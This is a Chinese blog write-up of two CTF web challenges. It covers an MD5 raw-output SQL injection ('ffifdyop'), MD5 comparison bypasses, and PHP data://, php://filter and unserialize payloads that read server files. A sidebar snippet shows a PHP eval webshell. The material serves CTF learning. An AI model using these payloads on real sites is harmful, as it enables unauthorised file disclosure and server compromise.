2021-03-28,[BJDCTF2020]Easy MD5,[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-01-07 15:09:54 发布
最新推荐文章于 2024-01-07 15:09:54 发布
阅读量119 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51792282/article/details/115283824
版权

[BJDCTF2020]Easy MD5

遇到web题,先F12,看element和network,查查有没有什么东西

有了hint
在这里插入图片描述
试一下像sql注入一样吧password闭合
但是有个问题,md5里不可能出现or 1=1之类的

那咋办,看函数
在这里插入图片描述
当第二个参数为ture时,会返回原始16字符二进制格式

现在的问题是,谁在md5之后会出现or的十六进制形式,6F 72

卡了

看writeup
之前的思路有个地方错了,那个sql是字符型注入,也就是要找 ‘or’
ffifdyop可以
在这里插入图片描述
最后是这样

select * from 'admin' where password=''or'6�]��!r,��b'

进入下一部分
Do You Like MD5?
在这里插入图片描述
md5弱比较,详见这篇博客
2021-03-14由一段代码引发的血案,md5,foreach,unset绕过,php伪协议

在这里插入图片描述

同上,用数组

[ZJCTF 2019]NiZhuanSiWei

在这里插入图片描述
file_get_contents() 把整个文件读入一个字符串中。
但是怎么知道text有没有东西

还有就是看uesless.php,什么都没有,可能是里面有一些注释的东西
这时想到了之前学过的php伪协议,用data进行写入,把

welcome to the zjctf

写进去
再在file里读出来,正好符合

http://29202b3d-1cb0-43a8-ac64-c30b1af2a283.node3.buuoj.cn
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
&file=php://filter/read=convert.base64-encode/resource=useless.php
&password=1

把返回的页面base64解码,出现如下代码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

出现了FLAG类
加上前面的unserialize函数,联系到反序列化,先把flag.php写出来再说

O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}

综合,如果file还是伪协议,回显的一直是那个base64,所以改写成文件名了

http://29202b3d-1cb0-43a8-ac64-c30b1af2a283.node3.buuoj.cn
?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
&file=useless.php
&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}

在这里插入图片描述
Ohhhhh
终于有个正常的返回了
flag呢?

F12,PLZ

if(2===3){  
	return ("flag{}");
}
ProbeN1
关注
专栏目录
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2814
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
js实现MD5加密算法.zip
04-14
前端md5加密算法,附带调用方式
2021 - 密码加密功能(md5)
斜杠青年博客
03-19 252
//md5 引入 import md5 from 'js-md5'; Vue.prototype.$md5 = md5; // 引入全局 // md5全局使用 this.$md5('555555') // 注意,参数必须是字符串类型
[BJDCTF2020]ZJCTF,不过如此
weixin_43749601的博客
01-30 492
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_matc
[原题复现]BJDCTF2020 WEB部分全部解
笑花大王
03-30 1431
简介 原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 1.Easy MD5 1.涉及知识点:md5函数特性绕过、SQL注入 md5() md5() 函数计算字符串的 MD5 散列。 m...
[BJDCTF2020]Easy MD5;[ZJCTF 2019]NiZhuanSiWei;[SUCTF 2019]CheckIn
feiniaotjx的博客
11-16 257
[BJDCTF2020]Easy MD5;[ZJCTF 2019]NiZhuanSiWei[BJDCTF2020]Easy MD5[ZJCTF 2019]NiZhuanSiWei [BJDCTF2020]Easy MD5 回显了select * from 'admin' where password=md5($pass,true) 这是md5的解释 若md5($pass,ture)的值存在'or '1,就会使sql语句变成 select * from 'admin' where password=''o
BUUCTF Web [BJDCTF2020]Easy MD5 & [ZJCTF 2019]NiZhuanSiWei 1
网安小趴菜
09-07 143
BUUCTF Web [BJDCTF2020]Easy MD5 & [ZJCTF 2019]NiZhuanSiWei 1
2021-01-23
m0_53314778的博客
01-23 344
[SUCTF 2019]CheckIn 一句话木马变形 <?php @eval($_POST['post']) ?> 一句话木马常见的可以是用php、jsp、asp、aspx来写 让一句话木马里没有 <? 所以用了<script language="php">eval($_POST['a']);</script>,但本质上还是 PHP 一句话木马,因为执行函数还是 PHP 的 eval()。 绕过文件检测 首先了解到用的是 exif_imagetype() 函数
题解记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 2809
BUUCTF Web
CTF刷题-汇总
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
[BJDCTF2020]Easy MD5 1
weixin_45577185的博客
06-24 1149
bp抓包看到: select * from ‘admin’ where password=md5($pass,true) 查看一下md5()函数的true参数 和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到 ffifdyop字符串会造成漏洞 ·在本地环境试验ffifdyop,输出的开头是’or’6xxxxxx 在数据库语句里就构成了select * from ‘admin’ where password= ''or’6xxxxxx ’ 相当于 password= ‘’ or 1.
[BJDCTF2020]Easy MD5(详细)
qq_43622442的博客
04-21 1万+
[BJDCTF2020]Easy MD5(详细) 这一题也是挺多知识点的。 1.打开网站,发现输入啥都没变化: 2.看到响应头有提示,应该是绕过md5进行注入了: 3.这里有个很离谱的点,我是真的没想到:          md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。也就是说会返...
BUUCTF [BJDCTF2020]Easy MD51 解析WP
最新发布
m0_73615178的博客
01-07 1383
首先,看题有个文本框和一个提交按钮,那么大致注入点从注入框下手,随意输入一个值,通过抓包和分析网址得出,传参方式为GET方式,后端判断语句为sql语句“select * from 'admin' where password=md5($pass,true)”,其中利用散列函数md5加密了password。MD5函数介绍, 语法:md5(string,raw),其中string要计算的字符串,raw(可选)规定十六进制或二进制输出格式true为原始16字符二进制格式,默认false32字符16进制格式。
[BJDCTF2020]Easy MD5【超详细讲解】
wo41ge的博客
11-15 2146
进入 题目链接 不管你输入什么 他只会修改这里 页面没有回显 没反应 开始 四处找找 这不就找到提示了吧 就很nice奥 进行post传参
[BJDCTF2020]Easy MD51
cuddlylm的博客
05-12 1629
考点:Sql md5注入,md5 passby 在header里面有提示 select * from 'admin' where password=md5($pass,true) 这个点做过原题,第一次做的话可能遇到这种会有点蒙,上网找 payload 可以很轻松地找到 ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6,而 Mysql 刚好又会吧 hex 转
2021-03-13睡前misc
热门推荐
探针一号的博客
03-14 4万+
N种方法解决 是这样的,下载了一个打开不了的.exe 用010打开发现有data:image/jpg;base64 于是方法很多了,可以找个在线解图片base64的网站 也可以自己用html 大白 一看就知道要修改图片的高度 找到并修改即可 感谢徐同学,一想到修改图片高度就想到他教我的时候 你竟然赶我走 一张可可爱爱无无语语的白白兔兔图片 属性里没啥东西,那就用010看看吧! 文件头是FFD8FF,搜一下文件尾FF D9,果然不是在最后 后面有什么么猫腻呢,让我康康 。。。。。 基础破解 昨天lz就下
2021-03-26,拉胯的三条命令,HappyCTFd
探针一号的博客
03-26 1010
在TCP协议的三次握手中,[SYN]标志表示建立连接,[ACK]表示响应
攻防世界xff_referer
探针一号的博客
01-24 718
X老师告诉小宁其实xff和referer是可以伪造的。 (1)X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。xff 是http的拓展头部,作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。格式为:X-Forwarded-For: 本机IP, 代理1IP, 代理2I
2021-04-06,[MRCTF2020]PYWebsite,[MRCTF2020]pyFlag
探针一号的博客
04-07 609
1
"2021-2022年单片机温度检测报警系统专题
The document "精品专题资料(2021-2022年收藏)基于单片机的多路温度检测报警系统.doc" provides a comprehensive introduction to a multi-temperature detection alarm system based on the AT89C51 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值